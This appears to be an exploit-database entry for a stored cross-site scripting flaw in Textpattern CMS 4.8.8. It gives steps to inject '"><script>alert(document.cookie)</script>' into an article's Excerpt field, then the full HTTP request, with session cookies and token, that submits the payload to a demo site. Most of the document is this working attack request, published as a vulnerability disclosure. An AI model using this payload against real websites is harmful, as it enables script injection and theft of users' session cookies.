158fcdfd5c
11 changes to exploits/shellcodes/ghdb Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution Monstra 3.0.4 - Stored Cross-Site Scripting (XSS) Online Thesis Archiving System v1.0 - Multiple-SQLi projectSend r1605 - CSV injection projectSend r1605 - Stored XSS Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated) Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated) PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
196 lines
No EOL
5.9 KiB
Text
196 lines
No EOL
5.9 KiB
Text
# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
|
|
# Date: 2023-06-13
|
|
# Exploit Author: tmrswrr
|
|
# Vendor Homepage: https://textpattern.com/
|
|
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
|
|
# Version: v4.8.8
|
|
# Tested : https://release-demo.textpattern.co/
|
|
|
|
|
|
--- Description ---
|
|
|
|
|
|
1) Login admin page , choose Content , Articles section :
|
|
https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
|
|
2) Write in Excerpt field this payload > "><script>alert(document.cookie)</script>
|
|
3) Click My Site will you see alert button
|
|
https://release-demo.textpattern.co/index.php?id=2
|
|
|
|
|
|
--- Request ---
|
|
|
|
POST /textpattern/index.php HTTP/2
|
|
Host: release-demo.textpattern.co
|
|
Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
|
|
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: https://release-demo.textpattern.co/
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
|
|
Content-Length: 4690
|
|
Origin: https://release-demo.textpattern.co
|
|
Dnt: 1
|
|
Sec-Fetch-Dest: empty
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Site: same-origin
|
|
Te: trailers
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="ID"
|
|
|
|
2
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="event"
|
|
|
|
article
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="step"
|
|
|
|
edit
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="Title"
|
|
|
|
hello
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="textile_body"
|
|
|
|
1
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="Body"
|
|
|
|
hello
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="textile_excerpt"
|
|
|
|
1
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="Excerpt"
|
|
|
|
"><script>alert(document.cookie)</script>
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="sPosted"
|
|
|
|
1686684925
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="sLastMod"
|
|
|
|
1686685069
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="AuthorID"
|
|
|
|
managing-editor179
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="LastModID"
|
|
|
|
managing-editor179
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="Status"
|
|
|
|
4
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="Section"
|
|
|
|
articles
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="override_form"
|
|
|
|
article_listing
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="year"
|
|
|
|
2023
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="month"
|
|
|
|
06
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="day"
|
|
|
|
13
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="hour"
|
|
|
|
19
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="minute"
|
|
|
|
35
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="second"
|
|
|
|
25
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="exp_year"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="exp_month"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="exp_day"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="exp_hour"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="exp_minute"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="exp_second"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="sExpires"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="Category1"
|
|
|
|
hope-for-the-future
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="Category2"
|
|
|
|
hope-for-the-future
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="url_title"
|
|
|
|
alert1
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="description"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="Keywords"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="Image"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="custom_1"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="custom_2"
|
|
|
|
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="save"
|
|
|
|
Save
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="app_mode"
|
|
|
|
async
|
|
-----------------------------26516646042700398511941284351
|
|
Content-Disposition: form-data; name="_txp_token"
|
|
|
|
fb6da7f582d0606882462bc4ed72238e
|
|
-----------------------------26516646042700398511941284351-- |